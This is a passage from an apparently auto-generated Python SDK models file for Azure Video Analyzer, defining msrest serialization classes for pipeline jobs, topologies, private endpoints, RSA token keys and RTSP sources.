:ivar source_mdm_namespace: The source MDM namespace.
:vartype source_mdm_namespace: str
:ivar supported_time_grain_types: The supported time grain types.
:vartype supported_time_grain_types: list[str]
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'display_description': {'readonly': True},
'unit': {'readonly': True},
'aggregation_type': {'readonly': True},
'lock_aggregation_type': {'readonly': True},
'dimensions': {'readonly': True},
'enable_regional_mdm_account': {'readonly': True},
'source_mdm_account': {'readonly': True},
'source_mdm_namespace': {'readonly': True},
'supported_time_grain_types': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'display_description': {'key': 'displayDescription', 'type': 'str'},
'unit': {'key': 'unit', 'type': 'str'},
'aggregation_type': {'key': 'aggregationType', 'type': 'str'},
'lock_aggregation_type': {'key': 'lockAggregationType', 'type': 'str'},
'supported_aggregation_types': {'key': 'supportedAggregationTypes', 'type': '[str]'},
'dimensions': {'key': 'dimensions', 'type': '[MetricDimension]'},
'enable_regional_mdm_account': {'key': 'enableRegionalMdmAccount', 'type': 'bool'},
'source_mdm_account': {'key': 'sourceMdmAccount', 'type': 'str'},
'source_mdm_namespace': {'key': 'sourceMdmNamespace', 'type': 'str'},
'supported_time_grain_types': {'key': 'supportedTimeGrainTypes', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(MetricSpecification, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.display_description = None
self.unit = None
self.aggregation_type = None
self.lock_aggregation_type = None
self.supported_aggregation_types = kwargs.get('supported_aggregation_types', None)
self.dimensions = None
self.enable_regional_mdm_account = None
self.source_mdm_account = None
self.source_mdm_namespace = None
self.supported_time_grain_types = None
class NetworkAccessControl(msrest.serialization.Model):
"""Network access control for video analyzer account.
:param integration: Public network access for integration group.
:type integration: ~video_analyzer.models.GroupLevelAccessControl
:param ingestion: Public network access for ingestion group.
:type ingestion: ~video_analyzer.models.GroupLevelAccessControl
:param consumption: Public network access for consumption group.
:type consumption: ~video_analyzer.models.GroupLevelAccessControl
"""
_attribute_map = {
'integration': {'key': 'integration', 'type': 'GroupLevelAccessControl'},
'ingestion': {'key': 'ingestion', 'type': 'GroupLevelAccessControl'},
'consumption': {'key': 'consumption', 'type': 'GroupLevelAccessControl'},
}
def __init__(
self,
**kwargs
):
super(NetworkAccessControl, self).__init__(**kwargs)
self.integration = kwargs.get('integration', None)
self.ingestion = kwargs.get('ingestion', None)
self.consumption = kwargs.get('consumption', None)
class NodeInput(msrest.serialization.Model):
"""Describes an input signal to be used on a pipeline node.
All required parameters must be populated in order to send to Azure.
:param node_name: Required. The name of the upstream node in the pipeline which output is used
as input of the current node.
:type node_name: str
"""
_validation = {
'node_name': {'required': True},
}
_attribute_map = {
'node_name': {'key': 'nodeName', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(NodeInput, self).__init__(**kwargs)
self.node_name = kwargs['node_name']
class Operation(msrest.serialization.Model):
"""An operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. The operation name.
:type name: str
:param display: The operation display name.
:type display: ~video_analyzer.models.OperationDisplay
:param origin: Origin of the operation.
:type origin: str
:param properties: Operation properties format.
:type properties: ~video_analyzer.models.Properties
:param is_data_action: Whether the operation applies to data-plane.
:type is_data_action: bool
:param action_type: Indicates the action type. Possible values include: "Internal".
:type action_type: str or ~video_analyzer.models.ActionType
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
'origin': {'key': 'origin', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'Properties'},
'is_data_action': {'key': 'isDataAction', 'type': 'bool'},
'action_type': {'key': 'actionType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Operation, self).__init__(**kwargs)
self.name = kwargs['name']
self.display = kwargs.get('display', None)
self.origin = kwargs.get('origin', None)
self.properties = kwargs.get('properties', None)
self.is_data_action = kwargs.get('is_data_action', None)
self.action_type = kwargs.get('action_type', None)
class OperationCollection(msrest.serialization.Model):
"""A collection of Operation items.
:param value: A collection of Operation items.
:type value: list[~video_analyzer.models.Operation]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Operation]'},
}
def __init__(
self,
**kwargs
):
super(OperationCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class OperationDisplay(msrest.serialization.Model):
"""Operation details.
:param provider: The service provider.
:type provider: str
:param resource: Resource on which the operation is performed.
:type resource: str
:param operation: The operation type.
:type operation: str
:param description: The operation description.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(OperationDisplay, self).__init__(**kwargs)
self.provider = kwargs.get('provider', None)
self.resource = kwargs.get('resource', None)
self.operation = kwargs.get('operation', None)
self.description = kwargs.get('description', None)
class ParameterDeclaration(msrest.serialization.Model):
"""Single topology parameter declaration. Declared parameters can and must be referenced throughout the topology and can optionally have default values to be used when they are not defined in the pipelines.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the parameter.
:type name: str
:param type: Required. Type of the parameter. Possible values include: "String",
"SecretString", "Int", "Double", "Bool".
:type type: str or ~video_analyzer.models.ParameterType
:param description: Description of the parameter.
:type description: str
:param default: The default value for the parameter to be used if the pipeline does not specify
a value.
:type default: str
"""
_validation = {
'name': {'required': True},
'type': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'default': {'key': 'default', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ParameterDeclaration, self).__init__(**kwargs)
self.name = kwargs['name']
self.type = kwargs['type']
self.description = kwargs.get('description', None)
self.default = kwargs.get('default', None)
class ParameterDefinition(msrest.serialization.Model):
"""Defines the parameter value of an specific pipeline topology parameter. See pipeline topology parameters for more information.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the parameter declared in the pipeline topology.
:type name: str
:param value: Parameter value to be applied on this specific pipeline.
:type value: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ParameterDefinition, self).__init__(**kwargs)
self.name = kwargs['name']
self.value = kwargs.get('value', None)
class PemCertificateList(CertificateSource):
"""A list of PEM formatted certificates.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param certificates: Required. PEM formatted public certificates. One certificate per entry.
:type certificates: list[str]
"""
_validation = {
'type': {'required': True},
'certificates': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'certificates': {'key': 'certificates', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(PemCertificateList, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.PemCertificateList' # type: str
self.certificates = kwargs['certificates']
class PipelineJob(ProxyResource):
"""Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: Reference to an existing pipeline topology. When activated, this pipeline
job will process content according to the pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:ivar state: Current state of the pipeline (read-only). Possible values include: "Processing",
"Canceled", "Completed", "Failed".
:vartype state: str or ~video_analyzer.models.PipelineJobState
:ivar expiration: The date-time by when this pipeline job will be automatically deleted from
your account.
:vartype expiration: ~datetime.datetime
:ivar error: Details about the error, in case the pipeline job fails.
:vartype error: ~video_analyzer.models.PipelineJobError
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameters values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can be optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
'expiration': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'state': {'key': 'properties.state', 'type': 'str'},
'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'},
'error': {'key': 'properties.error', 'type': 'PipelineJobError'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(PipelineJob, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.state = None
self.expiration = None
self.error = None
self.parameters = kwargs.get('parameters', None)
class PipelineJobCollection(msrest.serialization.Model):
"""A collection of PipelineJob items.
:param value: A collection of PipelineJob items.
:type value: list[~video_analyzer.models.PipelineJob]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PipelineJob]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class PipelineJobError(msrest.serialization.Model):
"""Details about the error for a failed pipeline job.
:param code: The error code.
:type code: str
:param message: The error message.
:type message: str
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobError, self).__init__(**kwargs)
self.code = kwargs.get('code', None)
self.message = kwargs.get('message', None)
class PipelineJobOperationStatus(msrest.serialization.Model):
"""Used for tracking the status of an operation on the pipeline job.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the pipeline job operation.
:vartype name: str
:ivar status: The status of the pipeline job operation.
:vartype status: str
:ivar error: The error details for the pipeline job operation.
:vartype error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'readonly': True},
'status': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobOperationStatus, self).__init__(**kwargs)
self.name = None
self.status = None
self.error = None
class PipelineJobUpdate(ProxyResource):
"""Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: Reference to an existing pipeline topology. When activated, this pipeline
job will process content according to the pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:ivar state: Current state of the pipeline (read-only). Possible values include: "Processing",
"Canceled", "Completed", "Failed".
:vartype state: str or ~video_analyzer.models.PipelineJobState
:ivar expiration: The date-time by when this pipeline job will be automatically deleted from
your account.
:vartype expiration: ~datetime.datetime
:ivar error: Details about the error, in case the pipeline job fails.
:vartype error: ~video_analyzer.models.PipelineJobError
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameters values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can be optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
'expiration': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'state': {'key': 'properties.state', 'type': 'str'},
'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'},
'error': {'key': 'properties.error', 'type': 'PipelineJobError'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobUpdate, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.state = None
self.expiration = None
self.error = None
self.parameters = kwargs.get('parameters', None)
class PipelineTopology(ProxyResource):
"""Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following:
* Parameters: list of user defined parameters that can be references across the topology nodes.
* Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras.
* Processors: list of nodes which perform data analysis or transformations.
* Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param kind: Required. Topology kind. Possible values include: "Live", "Batch".
:type kind: str or ~video_analyzer.models.Kind
:param sku: Required. Describes the properties of a SKU.
:type sku: ~video_analyzer.models.Sku
:param description: An optional description of the pipeline topology. It is recommended that
the expected use of the topology to be described here.
:type description: str
:param parameters: List of the topology parameter declarations. Parameters declared here can be
referenced throughout the topology nodes through the use of "${PARAMETER_NAME}" string pattern.
Parameters can have optional default values and can later be defined in individual instances of
the pipeline.
:type parameters: list[~video_analyzer.models.ParameterDeclaration]
:param sources: List of the topology source nodes. Source nodes enable external data to be
ingested by the pipeline.
:type sources: list[~video_analyzer.models.SourceNodeBase]
:param processors: List of the topology processor nodes. Processor nodes enable pipeline data
to be analyzed, processed or transformed.
:type processors: list[~video_analyzer.models.ProcessorNodeBase]
:param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or
exported.
:type sinks: list[~video_analyzer.models.SinkNodeBase]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'kind': {'required': True},
'sku': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'kind': {'key': 'kind', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'},
'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'},
'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'},
'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopology, self).__init__(**kwargs)
self.kind = kwargs['kind']
self.sku = kwargs['sku']
self.description = kwargs.get('description', None)
self.parameters = kwargs.get('parameters', None)
self.sources = kwargs.get('sources', None)
self.processors = kwargs.get('processors', None)
self.sinks = kwargs.get('sinks', None)
class PipelineTopologyCollection(msrest.serialization.Model):
"""A collection of PipelineTopology items.
:param value: A collection of PipelineTopology items.
:type value: list[~video_analyzer.models.PipelineTopology]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PipelineTopology]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopologyCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class PipelineTopologyUpdate(ProxyResource):
"""Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following:
* Parameters: list of user defined parameters that can be references across the topology nodes.
* Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras.
* Processors: list of nodes which perform data analysis or transformations.
* Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param kind: Topology kind. Possible values include: "Live", "Batch".
:type kind: str or ~video_analyzer.models.Kind
:param sku: Describes the properties of a SKU.
:type sku: ~video_analyzer.models.Sku
:param description: An optional description of the pipeline topology. It is recommended that
the expected use of the topology to be described here.
:type description: str
:param parameters: List of the topology parameter declarations. Parameters declared here can be
referenced throughout the topology nodes through the use of "${PARAMETER_NAME}" string pattern.
Parameters can have optional default values and can later be defined in individual instances of
the pipeline.
:type parameters: list[~video_analyzer.models.ParameterDeclaration]
:param sources: List of the topology source nodes. Source nodes enable external data to be
ingested by the pipeline.
:type sources: list[~video_analyzer.models.SourceNodeBase]
:param processors: List of the topology processor nodes. Processor nodes enable pipeline data
to be analyzed, processed or transformed.
:type processors: list[~video_analyzer.models.ProcessorNodeBase]
:param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or
exported.
:type sinks: list[~video_analyzer.models.SinkNodeBase]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'kind': {'key': 'kind', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'},
'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'},
'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'},
'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopologyUpdate, self).__init__(**kwargs)
self.kind = kwargs.get('kind', None)
self.sku = kwargs.get('sku', None)
self.description = kwargs.get('description', None)
self.parameters = kwargs.get('parameters', None)
self.sources = kwargs.get('sources', None)
self.processors = kwargs.get('processors', None)
self.sinks = kwargs.get('sinks', None)
class PrivateEndpoint(msrest.serialization.Model):
"""The Private Endpoint resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The ARM identifier for Private Endpoint.
:vartype id: str
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpoint, self).__init__(**kwargs)
self.id = None
class PrivateEndpointConnection(Resource):
"""The Private Endpoint Connection resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param private_endpoint: The resource of private end point.
:type private_endpoint: ~video_analyzer.models.PrivateEndpoint
:param private_link_service_connection_state: A collection of information about the state of
the connection between service consumer and provider.
:type private_link_service_connection_state:
~video_analyzer.models.PrivateLinkServiceConnectionState
:ivar provisioning_state: The provisioning state of the private endpoint connection resource.
Possible values include: "Succeeded", "Creating", "Deleting", "Failed".
:vartype provisioning_state: str or
~video_analyzer.models.PrivateEndpointConnectionProvisioningState
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'private_endpoint': {'key': 'properties.privateEndpoint', 'type': 'PrivateEndpoint'},
'private_link_service_connection_state': {'key': 'properties.privateLinkServiceConnectionState', 'type': 'PrivateLinkServiceConnectionState'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnection, self).__init__(**kwargs)
self.private_endpoint = kwargs.get('private_endpoint', None)
self.private_link_service_connection_state = kwargs.get('private_link_service_connection_state', None)
self.provisioning_state = None
class PrivateEndpointConnectionListResult(msrest.serialization.Model):
"""List of private endpoint connection associated with the specified storage account.
:param value: Array of private endpoint connections.
:type value: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnectionListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class PrivateLinkResource(Resource):
"""A private link resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:ivar group_id: The private link resource group id.
:vartype group_id: str
:ivar required_members: The private link resource required member names.
:vartype required_members: list[str]
:param required_zone_names: The private link resource Private link DNS zone name.
:type required_zone_names: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'group_id': {'readonly': True},
'required_members': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'group_id': {'key': 'properties.groupId', 'type': 'str'},
'required_members': {'key': 'properties.requiredMembers', 'type': '[str]'},
'required_zone_names': {'key': 'properties.requiredZoneNames', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResource, self).__init__(**kwargs)
self.group_id = None
self.required_members = None
self.required_zone_names = kwargs.get('required_zone_names', None)
class PrivateLinkResourceListResult(msrest.serialization.Model):
"""A list of private link resources.
:param value: Array of private link resources.
:type value: list[~video_analyzer.models.PrivateLinkResource]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateLinkResource]'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResourceListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class PrivateLinkServiceConnectionState(msrest.serialization.Model):
"""A collection of information about the state of the connection between service consumer and provider.
:param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner
of the service. Possible values include: "Pending", "Approved", "Rejected".
:type status: str or ~video_analyzer.models.PrivateEndpointServiceConnectionStatus
:param description: The reason for approval/rejection of the connection.
:type description: str
:param actions_required: A message indicating if changes on the service provider require any
updates on the consumer.
:type actions_required: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'actions_required': {'key': 'actionsRequired', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkServiceConnectionState, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
self.description = kwargs.get('description', None)
self.actions_required = kwargs.get('actions_required', None)
class Properties(msrest.serialization.Model):
"""Metric properties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar service_specification: The service specifications.
:vartype service_specification: ~video_analyzer.models.ServiceSpecification
"""
_validation = {
'service_specification': {'readonly': True},
}
_attribute_map = {
'service_specification': {'key': 'serviceSpecification', 'type': 'ServiceSpecification'},
}
def __init__(
self,
**kwargs
):
super(Properties, self).__init__(**kwargs)
self.service_specification = None
class ResourceIdentity(msrest.serialization.Model):
"""The user assigned managed identity to use when accessing a resource.
All required parameters must be populated in order to send to Azure.
:param user_assigned_identity: Required. The user assigned managed identity's resource
identifier to use when accessing a resource.
:type user_assigned_identity: str
"""
_validation = {
'user_assigned_identity': {'required': True},
}
_attribute_map = {
'user_assigned_identity': {'key': 'userAssignedIdentity', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceIdentity, self).__init__(**kwargs)
self.user_assigned_identity = kwargs['user_assigned_identity']
class RsaTokenKey(TokenKey):
"""Required validation properties for tokens generated with RSA algorithm.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
:param alg: Required. RSA algorithm to be used: RS256, RS384 or RS512. Possible values include:
"RS256", "RS384", "RS512".
:type alg: str or ~video_analyzer.models.AccessPolicyRsaAlgo
:param n: Required. RSA public key modulus.
:type n: str
:param e: Required. RSA public key exponent.
:type e: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
'alg': {'required': True},
'n': {'required': True},
'e': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
'alg': {'key': 'alg', 'type': 'str'},
'n': {'key': 'n', 'type': 'str'},
'e': {'key': 'e', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(RsaTokenKey, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.RsaTokenKey' # type: str
self.alg = kwargs['alg']
self.n = kwargs['n']
self.e = kwargs['e']
class SourceNodeBase(NodeBase):
"""Base class for topology source nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: RtspSource, VideoSource.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.RtspSource': 'RtspSource', '#Microsoft.VideoAnalyzer.VideoSource': 'VideoSource'}
}
def __init__(
self,
**kwargs
):
super(SourceNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SourceNodeBase' # type: str
class RtspSource(SourceNodeBase):
"""RTSP source allows for media from an RTSP camera or generic RTSP server to be ingested into a pipeline.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param transport: Network transport utilized by the RTSP and RTP exchange: TCP or HTTP. When
using TCP, the RTP packets are interleaved on the TCP RTSP connection. When using HTTP, the
RTSP messages are exchanged through long lived HTTP connections, and the RTP packages are
interleaved in the HTTP connections alongside the RTSP messages. Possible values include:
"Http", "Tcp".
:type transport: str or ~video_analyzer.models.RtspTransport
:param endpoint: Required. RTSP endpoint information for Video Analyzer to connect to. This
contains the required information for Video Analyzer to connect to RTSP cameras and/or generic
RTSP servers.
:type endpoint: ~video_analyzer.models.EndpointBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
